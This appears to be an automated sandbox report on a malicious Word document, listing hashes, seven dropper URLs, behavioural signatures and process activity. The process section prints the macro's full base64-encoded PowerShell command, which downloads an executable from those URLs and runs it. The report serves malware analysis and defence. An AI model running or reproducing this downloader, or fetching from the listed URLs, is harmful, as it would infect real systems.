Analysis

  • max time kernel
    110s
  • max time network
    93s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    22-05-2022 05:24

General

  • Target

    fddwfhwu.doc

  • Size

    178KB

  • MD5

    8edc3c8487342e650a803d995eda3aee

  • SHA1

    eed3e8ce919a1ed602997d1a1137f8d19a554b25

  • SHA256

    d264878eae29d3da022f38e67a38560346ba42cbb6dbebbf0e6c852c666fb1ac

  • SHA512

    1b7500d183db31f3f5eefd80a62a9eaf36aff9024c7c2b37f5e8525b3633db4bab7441ea2e7914cec269bf6a9d403b55273295f6953fda53ab1906c2d986d272

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.hhbiao.com/ro/hEGGg/

exe.dropper

https://kissanime24.com/anime/tnqblnm875789/

exe.dropper

http://ahansatan.com/wp-admin/IPTpsJjvkKHDM/

exe.dropper

http://goldoni.co.uk/bmnfg411/qQmxCDIzDcR/

exe.dropper

http://hirken.com.au/images/kul5uy3a48/

exe.dropper

http://hofhuistechniek.nl/localhost/ZDN9mtkv7hsl25097064/

exe.dropper

http://itcnt.com.np/2xk_kxs_r3u3g4/u2ka4qa5362685/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 11 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fddwfhwu.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1060
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABMAF8AdgB1ADcAMgA0AD0AKAAnAEoAXwAnACsAJwAzADYAJwArACcANgAxAG4AJwApADsAJgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBOAHYAOgBUAGUATQBQAFwAbwBmAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAHIARQBDAFQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAEMAVQBgAFIAaQBUAHkAcABgAFIAbwB0AGAAbwBDAG8ATAAiACAAPQAgACgAJwB0AGwAcwAnACsAJwAxADIALAAgAHQAJwArACcAbABzACcAKwAnADEAMQAsACAAdABsAHMAJwApADsAJABKADMAZgA4ADMAbgBsACAAPQAgACgAJwBOACcAKwAnAHQAJwArACcANgB1AHcAZgB2ACcAKQA7ACQATAAwAHMAMgBuAF8AeAA9ACgAJwBCAG0AYgBkAHUAXwAnACsAJwBiACcAKQA7ACQARgB2ADgAaAA5ADIAdAA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACcATgBkAHQATwBmAGYAaQAnACsAJwBjAGUAMgAwADEAOQBOACcAKwAnAGQAdAAnACkALgAiAFIARQBQAGAATABhAGMARQAiACgAKABbAGMAaABhAFIAXQA3ADgAKwBbAGMAaABhAFIAXQAxADAAMAArAFsAYwBoAGEAUgBdADEAMQA2ACkALABbAFMAdAByAGkATgBnAF0AWwBjAGgAYQBSAF0AOQAyACkAKQArACQASgAzAGYAOAAzAG4AbAArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7ACQAVQB5ADUAMABfAHoAdQA9ACgAJwBLADEAbwAnACsAJwBpAHMAMgB2ACcAKQA7ACQAUABiAHIAYgBlAHQAbgA9AC4AKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgBXAEUAYgBDAEwAaQBlAE4AVAA7ACQASABfAG8ANwBzAHQAOAA9ACgAJwBoACcAKwAnAHQAdABwAHMAOgAnACsAJwAvAC8AdwB3ACcAKwAnAHcALgAnACsAJwBoACcAKwAnAGgAJwArACcAYgBpAGEAbwAuACcAKwAnAGMAbwBtACcAKwAnAC8AcgBvAC8AJwArACcAaABFAEcARwBnAC8AJwArACcAKgBoACcAKwAnAHQAdABwAHMAOgAvAC8AawBpAHMAcwBhAG4AaQBtAGUAJwArACcAMgA0AC4AYwBvAG0ALwBhAG4AaQBtAGUALwB0AG4AcQBiAGwAJwArACcAbgBtADgAJwArACcANwA1ADcAOAAnACsAJwA5AC8AKgBoACcAKwAnAHQAdABwADoALwAvAGEAaABhAG4AcwAnACsAJwBhAHQAYQBuAC4AYwBvACcAKwAnAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBJAFAAJwArACcAVAAnACsAJwBwAHMASgBqACcAKwAnAHYAawAnACsAJwBLACcAKwAnAEgARABNAC8AKgBoAHQAdABwADoALwAnACsAJwAvAGcAbwBsAGQAbwBuAGkALgBjAG8ALgB1AGsALwBiAG0AbgBmAGcANAAxADEALwBxAFEAbQB4ACcAKwAnAEMARABJAHoARABjAFIALwAqAGgAdAAnACsAJwB0ACcAKwAnAHAAOgAnACsAJwAvACcAKwAnAC8AaABpAHIAawBlAG4ALgBjAG8AbQAuAGEAdQAvAGkAbQAnACsAJwBhACcAKwAnAGcAZQBzAC8AawB1AGwANQB1AHkAJwArACcAMwBhACcAKwAnADQAOAAvACoAaAAnACsAJwB0AHQAcAA6AC8AJwArACcALwBoACcAKwAnAG8AZgBoAHUAaQBzAHQAJwArACcAZQAnACsAJwBjAGgAJwArACcAbgBpAGUAawAuAG4AbAAvAGwAJwArACcAbwBjAGEAbAAnACsAJwBoAG8AcwB0AC8AWgBEAE4AJwArACcAOQBtACcAKwAnAHQAawAnACsAJwB2ADcAaABzACcAKwAnAGwAMgA1ADAAJwArACcAOQA3ACcAKwAnADAANgA0AC8AKgBoACcAKwAnAHQAdAAnACsAJwBwADoALwAnACsAJwAvAGkAdABjACcAKwAnAG4AdAAuACcAKwAnAGMAbwBtAC4AbgBwAC8AMgB4AGsAJwArACcAXwBrACcAKwAnAHgAcwBfAHIAJwArACcAMwB1ADMAZwA0AC8AdQAyAGsAYQA0AHEAJwArACcAYQA1ACcAKwAnADMAJwArACcANgAyACcAKwAnADYAOAAnACsAJwA1AC8AJwApAC4AIgBTAGAAUABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEsAYQBlADgAaQBjADcAPQAoACcASQBtADQAcwAnACsAJwB5AGsAOAAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABVAG8AdQByAGMAZQB0ACAAaQBuACAAJABIAF8AbwA3AHMAdAA4ACkAewB0AHIAeQB7ACQAUABiAHIAYgBlAHQAbgAuACIARABvAFcATgBgAGwATwBhAEQAYABGAEkAbABlACIAKAAkAFUAbwB1AHIAYwBlAHQALAAgACQARgB2ADgAaAA5ADIAdAApADsAJABNAG4AMwAwAGwAeAB2AD0AKAAnAEsANgBtAHkAdwAnACsAJwBvACcAKwAnADkAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEYAdgA4AGgAOQAyAHQAKQAuACIAbABFAE4AYABHAHQASAAiACAALQBnAGUAIAAyADYAMwA0ADgAKQAgAHsAJgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrAGUALQAnACsAJwBJAHQAZQBtACcAKQAoACQARgB2ADgAaAA5ADIAdAApADsAJABUAHoAdAA2AGUAaQB6AD0AKAAnAEwAeAAnACsAJwB5ADgAYgAnACsAJwBhAGQAJwApADsAYgByAGUAYQBrADsAJABXADIAZgBfAHgAMAAzAD0AKAAnAEoAcwAnACsAJwBvADIAaQA0ADkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABNADIAOAB3AG8AegBuAD0AKAAnAEMAJwArACcAZwA3ACcAKwAnAGEAOQA3AG4AJwApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1364

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1060-86-0x0000000000000000-mapping.dmp
    • memory/1312-69-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-62-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-57-0x0000000075AE1000-0x0000000075AE3000-memory.dmp
      Filesize

      8KB

    • memory/1312-71-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-59-0x0000000005AE0000-0x0000000005AE5000-memory.dmp
      Filesize

      20KB

    • memory/1312-60-0x0000000005AE0000-0x0000000005AE5000-memory.dmp
      Filesize

      20KB

    • memory/1312-61-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-72-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-63-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-64-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-65-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-66-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-67-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-74-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-70-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-54-0x0000000072B31000-0x0000000072B34000-memory.dmp
      Filesize

      12KB

    • memory/1312-58-0x000000007159D000-0x00000000715A8000-memory.dmp
      Filesize

      44KB

    • memory/1312-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1312-68-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-73-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-75-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-76-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-77-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-78-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-79-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-80-0x0000000005AE5000-0x0000000005AE8000-memory.dmp
      Filesize

      12KB

    • memory/1312-88-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1312-55-0x00000000705B1000-0x00000000705B3000-memory.dmp
      Filesize

      8KB

    • memory/1364-82-0x000007FEF39B0000-0x000007FEF450D000-memory.dmp
      Filesize

      11.4MB

    • memory/1364-84-0x000000001B740000-0x000000001BA3F000-memory.dmp
      Filesize

      3.0MB

    • memory/1364-85-0x000000000231B000-0x000000000233A000-memory.dmp
      Filesize

      124KB

    • memory/1364-83-0x0000000002314000-0x0000000002317000-memory.dmp
      Filesize

      12KB

    • memory/1364-81-0x000007FEFBF91000-0x000007FEFBF93000-memory.dmp
      Filesize

      8KB